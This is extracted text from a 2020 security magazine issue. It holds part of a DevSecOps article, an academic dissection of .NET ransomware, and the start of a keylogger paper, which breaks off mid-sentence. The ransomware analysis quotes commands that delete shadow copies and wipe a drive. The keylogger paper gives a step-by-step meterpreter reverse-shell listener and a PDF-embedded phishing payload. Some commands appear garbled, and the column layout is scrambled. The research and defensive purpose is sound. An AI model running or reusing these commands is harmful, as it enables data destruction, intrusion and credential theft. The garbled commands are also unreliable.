By using application security scanning
embedded within continuous integration
(CI), the organisation can automatically
test new and revised code and developers
can see the scan results within their pipe-
lines. This innovation allowed them to
quickly respond to auditors’ feedback on
the compliances of over 50 repositories
and build a complete security package
for integrating code changes into their
environment.
One of the senior auditors com-
mented in passing that having the
code quality, the static application
security testing (SAST) and container
scanning and the pipeline all auto-
mated is almost better than a manual
review. At the same time, the firm’s
deployments went from four hours to
less than 30 minutes, and teams were
more than twice as efficient via the
streamlined code-review-test-deploy
process through pipelines.
resources to prioritise and remediate
them all? Now they just represent a
liability.
• Assume everything is a weak link now.
Start from where you are and begin
using iterative, incremental security
testing, at the point of code commit,
to break down the work into smaller,
actionable scanning and remediation
cycles. It’s a bit like the proverbial
February 2020 Network Security
challenge of: How do you swallow an
elephant? One bite at a time.
• Test every code change, at least for
most common security vulnerabili-
ties, rather than narrowly focusing
on ‘critical’ apps.
Application infrastructure
security
As serverless applications become
abstracted away from the hardware on
which they run, and cloud native intro-
duces new attack surfaces via containers
and orchestrators, think about hardening
the application and monitoring these
new architectural elements.
The most effective steps you can take
here include:
• Hardening your apps by applying zero-
trust principles. Multi-factor authen-
tication (MFA) is one of your best
defences, so use it! Employ role-based
access controls (RBAC) to control how
files can be changed. And encrypt data
from inception to deletion.
• Applying principles of network secu-
rity within containers. Monitor east-
west traffic among applications inside
containers. And monitor application
and container behaviour for malicious
activity.
• Misconfigurations are probably the
greatest source of risk when you
consider the countless dials available
from cloud service providers, con-
tainers and orchestrators. Carefully
determine what your policies (and
related settings) should be and auto-
mate their use wherever possible.
Policy compliance and
auditability
The GDPR (General Data Protection
Regulation) has heightened the focus
on application security. While it centres
around protecting customer data pri-
vacy, applications are often the primary
attack path through which sensitive data
is leaked: for example, British Airways
is facing a record GDPR fine ($230m)
from a breach in 2018 that leaked
500,000 customer records.2
With such high stakes, auditing
becomes a way to identify compliance
FEATURE
risks proactively. Auditors focus on com-
mon controls and they love automation
and the consistency it provides; they
can inspect the automation rules and do
not need to see a large sample of results
to prove efficacy like they have to do
for manual controls. In addition, trace-
ability and accountability become even
more important capabilities to track who
changed what and when.
Key recommendations here include
automating common controls in your
SDLC to improve compliance and sim-
plify audits. Consider:
• Segregation of incompatible duties.
• Identity and access approval controls.
• Configuration management and
change control.
• Access restrictions for changes to
configurations and pipelines.
• Protections on branches and
environments.
• Audit logs.
• Licensed code usage.
• Security testing, including
dependencies and containers.
SDLC platform security
Your code is only as secure as the soft-
ware used to develop and deploy it.
Ensure that the tools your enterprise
relies on are tested and compliant them-
selves. Be wary of fragmented toolchains
that often rely on credentials stored in
scripts in order to reduce process friction
across functions, because these integra-
tions create vulnerabilities themselves.
The best advice in this area includes:
• Encourage use of a single platform for
the end-to-end SDLC to reduce vul-
nerable integrations (while at the same
time improving process efficiencies).
• Good hygiene is key (apply security
patches, update access controls, etc).
Use automation to enforce it.
As software evolves toward a next
generation characterised by rapid itera-
tion and new architectures even more
dependent upon cloud providers, the
way in which application security is
applied will need to evolve simultane-
ously. These recommendations can serve
as a guide post to your efforts.
7
 FEATURE

About the author
Cindy Blake is the senior security evangelist
at GitLab, which provides a single appli-
cation approach for the entire software
development lifecycle. She collaborates with
major enterprises around best practices for
integrated DevSecOps application security
solutions. Previously, as part of the Hewlett
Packard Enterprise (HPE) Fortify team,
she led early third-party research on the
intersection of development, security and
operations.  £183m over GDPR breach that
References
1. Lietz, Shannon. ‘What is
DevSecOps?’. DevSecOps, 1 Jun
2015. Accessed Jan 2020. www.
devsecops.org/blog/2015/2/15/
what-is-devsecops.
2. Lunden, Ingrid. ‘UK’s ICO
fines British Airways a record
leaked data from 500,000 users’.
TechCrunch, 8 Jul 2019. Accessed
Jan 2020. https://techcrunch.
com/2019/07/08/uks-ico-fines-brit-
ish-airways-a-record-183m-over-
gdpr-breach-that-leaked-data-from-
500000-users/.

Dissecting .NET
ransomware: key
generation, encryption Pranshu Bajpai Richard Enbody

and operation
Pranshu Bajpai and Richard Enbody, Michigan State University

The threat of ransomware is ever growing. Not all ransomware types are created
equal and the cryptosystems in some forms are more virulent than others. This the decompilation of select .NET ran-
article dissects eight real-world variants belonging to different families of .NET somware samples detailed in this article.
ransomware and provides insights into key generation, encryption and other
aspects of the ransomware kill chain. We also summarise ransomware execution
flow and dynamic library calls based on the collected evidence. While this analy- Cryptosystems and
sis was carried out using .NET ransomware samples, the lessons learned from the constraints
empirical evidence apply to all modern forms of ransomware and can be used for Ransomware poses a severe threat due to
building more effective ransomware solutions.
two main reasons – it is relatively easy
Ransomware has established its reputa- ransomware is a crucial part of creating to develop and it is highly effective in
tion as the top threat to security due effective solutions against this formidable delivering a denial of control (a variant
to its impartial attack on users and threat. of denial of service) attack when properly
organisations. The older ‘spray and pray’ As with most malware, analysts study- implemented.1 The development of ran-
infection tactics are still observed today, ing ransomware do not have the luxury somware involves a design strategy that
but of primary concern are the targeted of reading plain source code. However, is bound by a series of constraints. These
ransomware attacks where the adversaries interpreted languages such as .NET offer constraints formulate the ransomware
carefully select their victims to maximise the next best alternative in that ransom- kill chain and must be followed if the
impact. This targeted approach permits ware written in these languages can be ransomware is to succeed in its nefarious
the perpetrators to perform manual decompiled. The result of the decompi- objective. The constraints are defined as
reconnaissance of the victim’s networks lation is significantly closer to the actual follows:
and systems before affecting mass data source code in the case of interpreted • C1. Infiltrating the host system.
encryption. Accordingly, a larger subset of languages. Thus, while it is possible • C2. Gaining execution privileges.
hosts within the organisation is impacted for these types of ransomware to still • C3. Establishing a unique crypto-
with this effective, manual reconnaissance carry some level of obfuscation, analysis graphic secret.
that leads to a higher ransom demand. becomes easier when the malware is • C4. Enumerating files on the file
Unfortunately, ransom demands today written with an interpreted language. system.
frequently reach magnitudes of hun- Consequently, we break down opera- • C5. Modifying files in view of the
dreds of thousands of dollars. Studying tional characteristics common to most encryption scheme.
the underlying cryptosystem in modern ransomware and show empirical proof in • C6. Removing access to original files.

8
Network Security February 2020
 FEATURE

• C7. Protecting the encryption secret

until ransom is paid.
• C8. Maintaining a ransom payment
channel.
Please note that the words ‘files’ and
‘data’ are used interchangeably throughout
this article. Furthermore, C8 is not a con-
straint on the encryption component of the
ransomware and merely serves the financial
interests of the ransomware developer.
The constraints C1-C8 bind the overall
development of the ransomware since
removing one constraint from this kill
chain prevents the malware from realising
its objective. For instance, C1 and C2 are
essential to execute the threat on the host.
C3 is a crucial constraint since ransom-
ware needs unique keys for every victim
lest victims share keys among themselves
after one victim has paid the ransom.
Generating a cryptographically secure
key is not trivial, as discussed later in
this article. Next, file enumeration (C4)
involves generating a list of ‘files of inter- Figure 1: Hybrid cryptosystem in modern ransomware.
est’ to the ransomware and, to achieve
the leverage required for ransom, this Variations of this hybrid cryptosystem Similarly, the BlackRuby ransomware
list needs to include data critical to the are observed in almost all successful was observed concealing itself as a legiti-
victim. Enumeration is naturally followed Category 6 ransomware. The AES and mate Windows process, svchost.exe:
by encryption, C5, where the state of data RSA encryption schemes are popular process.StartInfo.FileName =
is altered such that only the attacker will choices for symmetric and asymmetric “Svchost.exe”;
have the ability to revert the encrypted ciphers respectively among ransomware In other cases, ransomware has been
state. Finally, C6 and C7 ensure that any developers. observed to inject itself into benign pro-
back-ups or alternative restoration proce- cesses running on the host. Thus, during
dures do not exist. Delivery and preparation the preparation phase, ransomware seeks
While these constraints bind ran- to ensure that the remaining execution
somware development, a cryptosystem Delivery and preparation is the first completes covertly and successfully with
needs to be devised that follows these stage of ransomware impacting a host. no hindrance from the host.
constraints and brings the victim’s data to Numerous delivery mechanisms are
an encrypted state. Ransomware families deployed by ransomware operators to Key generation phase
vary in the complexity observed in this propagate the malware. These include
cryptosystem but generally Category 6 phishing, exploiting known vulner- Once the preparation phase is complete,
ransomware deploys a hybrid cryptosys- abilities and bruteforcing weak RDP ransomware requires a cryptographic secret
tem that is a combination of asymmetric passwords. to commence encryption. Key generation
and symmetric encryption.2 This hybrid Once the malware establishes an ini- is a crucial part of the infection model since
cryptosystem is shown in Figure 1. tial foothold into the system, execution the ransomware must acquire unique key(s)
The salient features of this cryptosys- starts with the preparation phase and to infect the victim, as previously stated. A
tem are: may include procedures to conceal the plethora of options exist that facilitate key
1. A symmetric key is deployed for fast ongoing infection. For instance, ransom- generation but not all of them are crypto-
bulk data encryption. ware process names are usually benign to graphically effective, as shown next. There
2. An asymmetric, public key is avoid suspicion. In the case of the Jigsaw are a few primary approaches for key gen-
deployed for protecting (encrypting) ransomware, the infection binary is eration in ransomware.
the symmetric key. dropped with the following filenames: Embedded symmetric key: Hard-
3. The symmetric encryption key is Config.TempExeRelativePath = coding obfuscated secrets within the bina-
decrypted upon ransom payment “Drpbx\\drpbx.exe”; ry is clearly highly vulnerable to reverse
using the attacker’s unique access to Config.FinalExeRelativePath = engineering and yet several ransomware
the asymmetric private key. “Frfx\\firefox.exe”; variants are known to carry an embedded

9
February 2020 Network Security
 FEATURE
Figure 2: Key generation in AdamLocker.
Figure 3: Password string, key and IV in AdamLocker.
Figure 4: Key generation in WhiteRabbit.
symmetric key that is used for encryption.
As an example, Adamlocker is shown in
Figure 2 using the following string as a
password to derive the encryption key:
8jg7RPUMOvLBwr6WK6tf.
The key derivation function in
Adamlocker, conveniently named
CreateKey(), simply calculates a SHA-
512 hash of the password string. Since
SHA-512 always returns 64 bytes, the
first 32 bytes of this byte array are used
as an AES-256 key to encrypt all files
and the initialisation vector (IV) is con-
10
Network Security February 2020
structed with the next 16 bytes in the
byte array. The key and the IV are then
observed in the ransomware’s process
memory as shown in Figure 3.
Clearly, this is an ineffective approach
to generating an encryption key. Not
only is the password string hard-coded
in the binary, but an SHA hashing func-
tion is used to derive the needed key,
which is not designed to slow down
bruteforce attempts like a password-
based key derivation function (PBKDF)
shown later.
Using the random module:
WhiteRabbit ransomware uses System.
Random() to choose random characters
from a long ASCII string, as shown in
Figure 4.
An analysis of System.Random() reveals
that this method is not suitable for gener-
ating cryptographic secrets. The seed value
used by the constructor is Environment.
Tickcount, which counts the number
of milliseconds since the last computer
bootup. Consequently, this tickcount
value can be predicted by bruteforcing all
possibilities within the search space, since
most users restart their computer at least
every day, making exhaustive search within
this space quite feasible. Even with using
the standard PBKDF2 password-based key
derivation function that is designed to slow
down bruteforce password attacks, the seed
value is still within a search space finite
enough to be feasibly exhausted on an end-
user laptop without specialised hardware.
Acquiring key over the network:
Alphalocker reaches out with the victim’s
ID to its command and control (C&C)
server, as shown in Figure 5. An RSA
key pair is then generated at the C&C
server and the corresponding public key
is sent back to the ransomware client.
Alphalocker then generates unique AES
keys on the host and encrypts files with
AES. The AES keys are then encrypted
with the RSA public key returned by the
server, which is a variation of the hybrid
encryption approach discussed previously.
Alphalocker derives the AES keys
using the Rfc2898DeriveBytes() method
using the following statement:
deriveBytes = new
Rfc2898DeriveBytes
(passwordBytes, (byte[])obj2, 1000);
In the case of Alphalocker, malware
developers justifiably deployed the
Rfc2898DeriveBytes() method, which
implements password-based key deri-
vation functionality as specified by
PBKDF2. Using PBKDF2 is better
for deriving an AES key than simply
computing an SHA or other hash (as
seen in the case of Adamlocker), since
PBKDF2 is, by design, slow, in order
to provide resistance against bruteforce
attempts. Therefore, upon receiving the
cryptographic material from the C&C
server, Alphalocker can be quite effective
 FEATURE

in accomplishing its objective. However,

ransomware that relies on communication
with the C&C server is rated less virulent
since this dependency proves fatal when
the C&C server is offline or blocked at
the firewall. While the ransomware cli-
ent waits in a loop for response from the
C&C server, encryption cannot com-
mence in the absence of the required key.
Note that some ransomware types carry
a secondary approach in the form of a
hard-coded key as a failsafe in the event Figure 5: Key generation in Alphalocker.
that the ransomware cannot communi-
cate with the C&C server.
Using cryptographically secure
approaches: Category 6 ransomware
avoids dependency on the C&C server
and can generate unique encryption
keys on the host using cryptographically
secure random modules. The Alphabet
ransomware demonstrates this ability as
shown in Figure 6.
Figure 6: Key generation in Alphabet.
Alphabet fills a byte array with 32
random bytes to be used as an AES-256 The file encryption procedure for (CBC) mode is used for encryption,
key. It uses the standard crypto library Adamlocker is shown in Figure 8. The using an IV on the first block of data.3
call RNGCryptoServiceProvider(). ransomware deploys the FileSystem.
GetBytes, which is cryptographically GetDirectories() and FileSystem. Post-encryption phase
random and hence secure. This implies GetFiles() function calls to generate a list
that once the key is generated there is no of files to be encrypted. These calls are Besides key generation and encryption,
way to predict or reproduce this key or standard practice for file enumeration in ransomware performs additional back-
byte sequence post-infection. .NET. ground activities on the host, depending
In line with the hybrid cryptosystem To minimise errors, ransomware devel- on the variant. For instance, a large subset
in Figure 1, Alphabet later uses an RSA opers prefer the cryptographic abstrac- of variants was observed explicitly purg-
public key to protect the AES key as tion provided by the dynamic libraries ing volume shadow copies on the host, to
shown in Figure 7. that exist on the host, since writing hinder file recovery, by starting a new cmd
The EncryptionEngine class the encryption routines from scratch terminal process that uses vssadmin to qui-
observed in Figure 7 is embedded gets convoluted and hence error-prone. etly delete all shadow copies similar to this:
in the ransomware and it ultimately The RijndaelManaged class from the “C:\Windows\System32\cmd.exe”
utilises the following well-known System.Security.Cryptography names- /c vssadmin delete shadows /
library call to encrypt the AES key: pace is used to perform the encryption all /quiet & wmic shadowcopy
RSACryptoServiceProvider.Encrypt(). in most .NET ransomware. Specifically, delete & bcdedit /set {default}
CreateEncryptor() is used to create a bootstatuspolicy ignoreallfailures
File enumeration symmetric Rijndael encryptor object. & bcdedit /set {default}
Alphabet ransomware is also observed recoveryenabled no & wbadmin
Once the key generation is successful, the using the .NET Cryptostream class to delete catalog -quiet
ransomware now needs to enumerate files encrypt a file as shown in Figure 8. On the decryption front, we discovered
of interest on the host and commence The KeySize is set to 256 bits (or 32 that all eight .NET ransomware examples
encryption. Files of interest are generated bytes) and the BlockSize to 128 bits (16 studied contained a decryption compo-
using either an inclusion or an exclusion bytes), both of which correspond with nent that was set to decrypt the files if
list of file extensions. The ransomware AES-256. The Cipher Block Chaining the correct key was provided as an input.
will either carry a list of file extensions
to encrypt or a list of file extensions to
exclude from encryption. For instance, an
inclusion list is likely to include files with
DOCX and XLSX extensions whereas the
Figure 7: Encryption of AES key with an RSA public key in Alphabet.
exclusion list might specify DLL files.

11
February 2020 Network Security
 FEATURE
Figure 8: File encryption in Alphabet.
Figure 9: Jigsaw communicating with its C&C server.
Figure 10: Geographic location lookup in BlackRuby.
However, the decryption component is
not always a part of the infection binary
and can be delivered to the victim post-
ransom payment. It should be noted that
12
Network Security February 2020
in the long term, it is in the best interest
of the underground ransomware industry
to decrypt data following a successful ran-
som payment to encourage other victims
to pay. In fact, a recent report indicates
that ransomware operators provided
decryption tools upon successful ransom
payment in 98% of cases.4
The password or string that is used
to construct the decryption key can be
encrypted and left on the host or sent back
to the C&C server as observed in the case
of the Jigsaw ransomware in Figure 9.
Jigsaw sends the machine name, user-
name and password, all concatenated as
a string, to the C&C server.
Finally, a ransom message is shown
to users, informing them of the data
encryption and payment route and con-
vincing them to pay the ransom. These
ransom messages can either be displayed
in a message box using the standard
Message() call in the case of .NET
ransomware or be placed in a ‘how-to-
decrypt.txt’ file that the user can access.
Alphabet ransomware allows five hours
for the payment before it executes the
following command, quietly wiping the
C: partition on the host:
Process.Start(“cmd”, “/c rd C:\\ /s /q “);
Alphabet and RansomAES also
launch a guard thread that kills the Task
Manager in an attempt to prevent the
user from killing the ransomware process:
Process.
GetProcessesByName(“taskmgr”)
[0].Kill();
Similar to other ransomware, .NET
ransomware will ensure that unen-
crypted secret keys do not persist on the
host by explicitly setting corresponding
parameters in the cryptographic service
provider. For instance, RansomAES sets
this parameter to False as follows:
rsacryptoServiceProvider.
PersistKeyInCsp = false;
Interestingly, BlackRuby looks up the
victim’s geographic location based on
the IP address and does not commence
encryption if the country code is ‘IR’
(Iran) as shown in Figure 10.
Furthermore, BlackRuby drops a mining
routine set to mine Monero, in parallel, on
the host computer, as shown in Figure 11.
Results
During this study, we conducted static
and dynamic analysis for the follow-
ing .NET ransomware samples on an
isolated Windows 10 sandbox. MD5

Figure 11: A
mining routine
ships embed-
ded within
BlackRuby.
Ransomware
Cryptoransomware
Jigsaw
Alphabet
Alphalocker
Adamlocker
WhiteRabbit
BlackRuby
RansomAES
Table 1: .NET ransomware samples studied.
hashes are shown in Table 1 to indicate
the variants studied.
ILSpy and dnSpy were used for
decompiling and debugging the ransom-
ware. Based on the evidence collected
from these samples, we have generalised
the flow of execution in .NET ransom-
ware in Figure 12.
This execution flow can be compre-
hended as follows. The .NET ransom-
ware infects the host and gains execution
privileges (C1, C2) and then takes steps
to conceal itself. It then acquires a key for
encryption (C3). Depending on the vari-
ant, a connection could be established with
the C&C server for this purpose. Files are
enumerated (C4) and encrypted (C5).
Original files are now replaced with their
Figure 12: Generalised flow of execution in .NET ransomware.
February 2020 Network Security
MD5 hash
84C44DF77EFB8A55ABD217A379C2589A
07046473F9BC851178EBC155D0BB916B
DBE78231174B03239EB262CC2D2D0900
C8EF7849A40DBC220B6B3CB5C9FAE496
D4452ADFC41A7075F5E5796172775898
E3F2CC2ADEEAABDF1B331153DE14174B
4958DDE3003BD4A89A6E82DC9ABD16CB
2B745E0A8DADAC6B2BECCD26DDB8C08D
encrypted counterparts (C6) and all plain-
text encryption keys are removed from the
host (C7). Finally, a ransom demand is
made (C8). Abstraction is used by ransom-
ware variants in the form of appropriate
library calls, as shown in Figure 12.
Conclusion
Despite several proposed solutions against
ransomware, this threat continues to
grow. Back-ups have existed as a solution
throughout this period and yet the cur-
rent threat scenario makes it abundantly
obvious that a more holistic approach is
needed to prepare against the menace of
ransomware. Simply stated, it is impera-
tive to formulate a defence-in-depth
FEATURE
strategy to effectively combat this issue.
The constraints of key generation,
encryption and other operational com-
ponents discussed in this paper allow us
to better comprehend our adverseries'
generic approach towards attaining their
objectives. This can facilitate the design
of more effective solutions that attack
multiple links in the ransomware kill
chain, thus satisfying the requirement
for a defence-in-depth approach.
About the authors
Pranshu Bajpai (@amirootyet) is a security
researcher working towards his PhD in com-
puter science and engineering at Michigan
State University. His research interests lie
in computer and network security, malware
analysis, digital forensics and cybercrime. In
the past, he worked as a penetration tester.
He has been an active speaker at conferences
and has spoken at DEFCON, APWG
eCrime conference, GrrCon, ToorCon,
CascadiaJS, BSides and others.
Dr Richard Enbody (enbody@cse.msu.edu)
is an associate professor in the Department
of Computer Science and Engineering,
Michigan State University. He joined the
faculty in 1987 after earning his PhD in
computer science from the University of
Minnesota. His research interests are in
computer security, computer architecture,
web-based distance education and parallel
processing. He has two patents pending on
hardware buffer-overflow protection against
computer worms and viruses. He recent-
ly co-authored a CS1 Python book, The
Practice of Computing using Python.
Resources
• ‘System.Security.Cryptography
Namespace’. Microsoft. Accessed Jan
2020. https://docs.microsoft.com/
en-us/dotnet/api/system.security.cryp
tography?view=netframework-4.8.
• dnSpy, home page. GitHub.
Accessed Jan 2020. https://github.
com/0xd4d/dnSpy.
• ‘Random Constructors’. Microsoft.
Accessed Jan 2020. https://
docs.microsoft.com/en-us/
dotnet/api/system.random.-
ctor?view=netframework-4.8.
• Malpedia, home page. Fraunhofer.
Accessed Jan 2020. https://malpedia.
caad.fkie.fraunhofer.de/
13
 FEATURE

• ‘PKCS #5: Password-Based References Crime Research (eCrime). IEEE, 2018.

Cryptography Specification Version
2.0’. Internet Engineering Task
Force. Accessed Jan 2020. https://
tools.ietf.org/html/rfc2898.
• .NET_Ransomware_Samples_
Studied.md, home page. GitHub.
Accessed Jan 2020. https://gist.
github.com/amirootyet/c098957def-
c3afc4139a8d10dd164824.
1. Sood, Aditya; Bajpai, Pranshu,
Enbody, Richard. ‘Evidential study
of ransomware: Cryptoviral infec-
tions and countermeasures’. ISACA
Journal, vol.5, pp.1-10, 2018.
2. Bajpai, Pranshu; Sood, Aditya;
Enbody, Richard. ‘A key-management-
based taxonomy for ransomware’. 2018
APWG Symposium on Electronic
3. Burr, WE. ‘Selecting the advanced
encryption standard’. IEEE Security
& Privacy, 1(2), pp.43-52, 2003.
4. ‘Ransomware payments rise as pub-
lic sector is targeted, new variants
enter the market’. Coveware, 2019.
Accessed Jan 2020. www.coveware.
com/blog/q3-ransomware-market-
place-report

Keyloggers:
silent cyber
security weapons Dr Akashdeep
Bhardwaj
Dr Sam Goundar

Dr Akashdeep Bhardwaj, School of Computer Science, University of Petroleum

& Energy Studies, Dehradun, India and Dr Sam Goundar, University of South
Pacific, Suva, Fiji

Cyber attackers are always seeking to design and push malicious software programs
to unsuspecting users, to intentionally steal or cause damage and exploit data on end
user systems. Malware types include spyware, keyloggers, rootkits and adware. In the tions of keyloggers.16-27 We propose that
past, script kiddies hacked computers to show off their skills and have fun. Today, the taxonomy needs to be defined accord-
hacking computers has become a huge cybercrime industry. Even as systems have ing to two criteria. The first is based on
improved in terms of both hardware and software, cyber attacks continue unabated. the location of execution and the second
is based on the functionalities offered.
The attacks have increased in complexity with legitimate programs, living as silent Depending on within which area inside
as well as impact. In May 2019, version 9 residents inside the user systems, perform- the user system the keylogger is set up and
of the Hawk Eye malware surfaced, target- ing actions in a covert manner without executed, we can define it as software- or
ing business users.1 The modus operandi attracting the attention of users.5 hardware-based. Software keyloggers are
of this malicious program has become Keyloggers, in common with many tro- installed as hidden applications by an
a cybercrime standard. IBM’s X-Force jans, are designed to mimic legitimate soft- attacker using social engineering methods.
reported the IP address origin of Hawk ware and bypass anti-virus or anti-malware These entice users to click on email attach-
Eye as being from Estonia, but it affected scanners.6 To make matters worse, the ments or open links and download appli-
global users.2 In March 2018, two hacker privilege level at which keyloggers execute cations. These are primarily trojans, which
groups compromised Cathay Pacific is higher than typical malware. This fea- in turn deploy the keylogger. Most keylog-
Airlines.3 One group installed a keylogger ture makes keyloggers almost impossible gers have predefined instructions while the
on Cathay’s server console port and the to detect and remove.7 Keylogger trojans command & control (C&C) servers may
other exploited the vulnerability. This led track keystrokes typed on the keyboard, supply further instructions.
to the exposure of the personally identifi- record screen activities and scan systems The deployed application has the abil-
able information of 9.4 million Cathay for specific documents and send the infor- ity to hide itself from anti-malware scan-
passengers, including names, addresses, mation back to the hacker. Although the ners. These applications are designed to
phone numbers, flight numbers, data, application of keyloggers per se is not ille- capture user keystrokes, monitor screen-
email addresses and membership num- gal, their use is mostly related to malicious shots and transfer specific user documents
bers.4 New malware is evolving at an activities, as mentioned in Table 1. based on commands issued by the attack-
incredible rate with seemingly endless er. Some keyloggers utilise API-based
malicious threats in the form of trojans Proposed taxonomy logging. In Microsoft Windows operating
detected every day. In this research, the systems, kernel-based keyloggers execute
authors focus specifically on keylogger tro- The authors surveyed several research hidden dynamic link libraries (DLLs)
jans. Such trojans share system resources publications and industry implementa- using hooking mechanisms. User actions,

14
Network Security February 2020

such as pressing keys, are translated into
Windows messages and pushed into the
system message queue. These apps reside
in the operating system kernel and inter-
cept data directly from the keyboard con-
troller interface. In case users employ an
on-screen keyboard to type and submit
data on web portals, screen recorder log-
ging is utilised. Form-grabbing keyloggers
capture form data instead of keystrokes
when the user clicks the submit button.
This data can typically include full name,
email, address, phone numbers, mobile
numbers, login credentials and payment
card info.
Hardware keyloggers are small physical
devices connected to the user system to
capture data using a hardware device. These
devices are installed on the system USB
port, embedded in the system BIOS, con-
nected between the I/O port and the key-
board or use acoustics. They have built-in
memory storage to store keystrokes. Usually
these devices are undetectable by any
known malware scanners, nor do they use
the system disk to store the captured logs.
Compared to software keyloggers, hard-
ware keyloggers have one major disadvan-
tage – these devices require physical access
and installation on the user’s system.
With the advent of touch screens, acous-
tic keyloggers transmit keystrokes using
enhanced encoding schemes. This is per-
formed by analysing the timing between
various keystrokes and the frequency of
repetition for similar acoustic signatures.
However, this consumes system resources
during data transmission.
Functional groups
The authors grouped keylogger func-
tionalities into five categories. The secu-
rity functionality relates to how keylog-
gers become invisible to evade detection,
hiding from Task Manager in order to
perform their execution. This aspect
also relates to protection of the logged
files using encryption, automatically
uninstalling and removing files at a pre-
defined date or duration, hiding any reg-
istry entries or timestamps in system logs
and sending log files to public SMTP
servers, making them invisible to users.
The second aspect relates to monitoring
options present in the keylogger. These
February 2020 Network Security
Sentiment Keylogger use
Parental monitoring
Improve employee
productivity
Positive
Investigate writing
Ethical hacking
Forensic investigations
Gather information
Negative
Record screen
Identity theft
Table 1: Keylogger usage examples.
include intercepting system logon cre-
dentials, as well as keys pressed, including
alphanumeric and special characters. File
operations (create, copy, rename, update
or delete) are logged. Copying from
system memory or clipboard content is
yet another advanced feature of many
keyloggers. In fact, some keyloggers have
been known to start and stop applica-
tions, including web cams, or even log off
and shut down systems. Monitoring the
print queue and the names of applications
clicked via the mouse are some note-
worthy monitoring features in high-end
keyloggers. Some keyloggers even record
on-mouse-clicks as well as webcam and
microphone audio recordings.
FEATURE
Description
Checking on the Internet browsing habits
and activities of children and students to
ensure cyber awareness and prevent them
from being engaged in harmful activities.8
The monitoring concept extends to check-
ing on time spent by employees on social
media or non-productive sites. This should,
however, be done with the employees’ con-
sent and with proper policies in place for
privacy and confidentiality.9
Research has established keyloggers as an
efficient tool for studies on cognitive writ-
ing processes (fluency and flow) as well as
learning second languages.10
Performing vulnerability assessment and
penetration testing by deliberately exploit-
ing user systems, then patching them to
mitigate future threats.11
Corporate, government and military espio-
nage to perform intrusion detection and digi-
tal forensics for cybercrime investigations.12
Logging and recording each and every
keystroke from a target system keyboard
is a simple process by which attackers can
steal sensitive information such as payment
card data, Social Security numbers and
driver licence details, as well as two-factor
authentication codes, passwords, email and
bank credentials.13
Performing visual surveillance and track file
creation, updating or copy-paste operations
on a target system by clicking and sending
snapshots at regular periods.14
After gathering personally identifiable
information (PII), carrying out economic and
financial fraud. This has occurred on a large
scale in recent times.15
The third aspect relates to monitor-
ing the user’s online activities. This
includes gathering lists and screenshots
of URLs and web portals accessed in
various Internet browsers, generating
lists of incoming and outgoing emails
via the browser as well as email client
applications, and capturing details of
the user’s messenger chats on Skype,
Twitter, Facebook, ICQ and other
social media clients.
Another critical feature is the reporting
and filtering of logs sent to the attacker.
This can be to a predefined set of C&C
systems or an individual attacker. The
reports typically contain the events, their
duration for predefined applications as
15
 FEATURE
Figure 1: The proposed taxonomy for keyloggers.
well as a report summary based on specific
keywords.
The final functionality of keyloggers is
the ability to react and send alerts based on
specific keywords. Keyloggers can also be
scheduled to start and stop logging or only
log keystrokes from specific websites. Some
keyloggers also provide real-time monitor-
ing or even viewing on mobile phones.
Backdoor algorithm
The authors developed and designed a
unique piece of keylogger malware not
yet detectable by Windows Defender
or standard anti-virus scanners. The
research involved the use of two sys-
tems – the C&C server and the user’s
Windows operating system. The authors
embedded the keylogger malware inside
a Word document and sent it via email.
The attacker waits for the user to open
the email attachment while keeping the
listener running. As soon as the user
opens the email attachment, the keylog-
ger malware is silently auto-executed in
the background. The user remains una-
ware of these activities. The algorithm
that follows illustrates the steps followed
for deployment of the keylogger on the
user system and capturing keystrokes
and screenshots, and gathering sensitive
documents.
Step 1: Create a keylogger trojan for
opening backdoor on user’s system using
Python and IDM.
Step 2: Set up Kali Linux to create
and setup the keylogger. From the Linux
16
Network Security February 2020
command line, install the Python library
in Kali Linux with ‘pip install pyput’.
Then from within Python, import this
library using: ‘import pyput’ and create
a keyboard listener object to sniff key-
strokes with:
Define key_press(key)
Print(key)
Keyboard_listener = pyput.
keyboard.Listener(on press=key_
press)
Step 3: The captured information is
going to be sent to 192.168.139.135 on
SSL port 443.
Step 4: From the Linux command
line, create the keylogger executable
using the following commands:
KL_Py_Load win/meterpreter/
rev_tcp LHOST = 192.168.139.135
LPORT = 443 R | msfencode-e x86/
klogattack -t exe -x /root/idman.exe
-o /root/klogger.exe
Step 5: Set up the listener on the
C&C server:
KL_Py_Load > use exploit/multi/
handler
KL_Py_Load exploit(handler) > set
PAYLOAD win/meterpreter/rev_tcp
PAYLOAD => win/meterpreter/
rev_tcp
KL_Py_Load exploit(handler) > set
LHOST 192.168.139.135
LHOST => 192.168.139.135
KL_Py_Load exploit(handler) > set
LPORT 443
LPORT => 443
KL_Py_Load exploit(handler) >
exploit
Step 6: Embed the executable into
Adobe Reader with:
KL_Py_Load > search type:exploit
platform:windows adobe pdf
Step 7: Set up the exploit for windows
with:
KL_Py_Load > use exploit/windows/
fileformat/PDF_embedded_exe
Step 8: Embed the keylogger payload
into the PDF with:
KL_Py_Load > exploit (PDF_
embedded_exe) > set payload
windows/meterpreter/reverse_tcp
Step 9: Set file name as Resume.pdf in
the INFILENAME option with:
KL_Py_Load > exploit (PDF_
embedded_exe) > set INFILENAME
Resume.pdf
Step 10: Change the filename to the
innocuous sounding name ‘Resume.pdf’:
KL_Py_Load > exploit (PDF_
embedded_exe) > set FILENAME
Resume.pdf
Step 11: Set the LHOST to our IP
address or (192.168.101.1):
KL_Py_Load > exploit (PDF_
embedded_exe) > set LHOST
192.168.101.1
Step 12: To verify options use:
KL_Py_Load > exploit (PDF_
embedded_exe) > show options
Step 13: Send the PDF file with the
embedded keylogger by email (employing
social engineering techniques) to users.
Step 14: As soon as the PDF attach-
ment is opened, the listener on the
C&C server will issue a prompt.
Step 15: The attacker now has access
to the user system.
The next section further illustrates the
actions performed to gather information
from the user system.
Research performed
Once the user system is connected to
the Internet, the listener is able to com-
municate with the malware. The session
works on port 443, which is allowed
and open in most organisation network
firewalls for inbound and outbound traf-
fic. The listener presents three specific
keylogging options to the attacker on the
C&C server as presented in Figure 2.
On selecting the first option, the attack-
er starts receiving keystrokes pressed on the

user’s keyboard. These are auto-saved in
the attacker’s system in the C:\KeyLogger\
Keystrokes folder as the Users1.txt file.
This has details of the keystrokes, which
include time, data and every key pressed,
as illustrated in Figure 3.
On selecting the second option, the
attacker starts receiving screenshots of the
user’s monitor, as illustrated in Figure 4.
These are stored on the attacker’s system
at C:\KeyLogger\Screenshots. The default
duration delay is two seconds. This
includes websites being browsed or appli-
cations open on the screen.
The third option is more sinister as it
searches for data and files on the user’s
system. This includes PDF and Microsoft
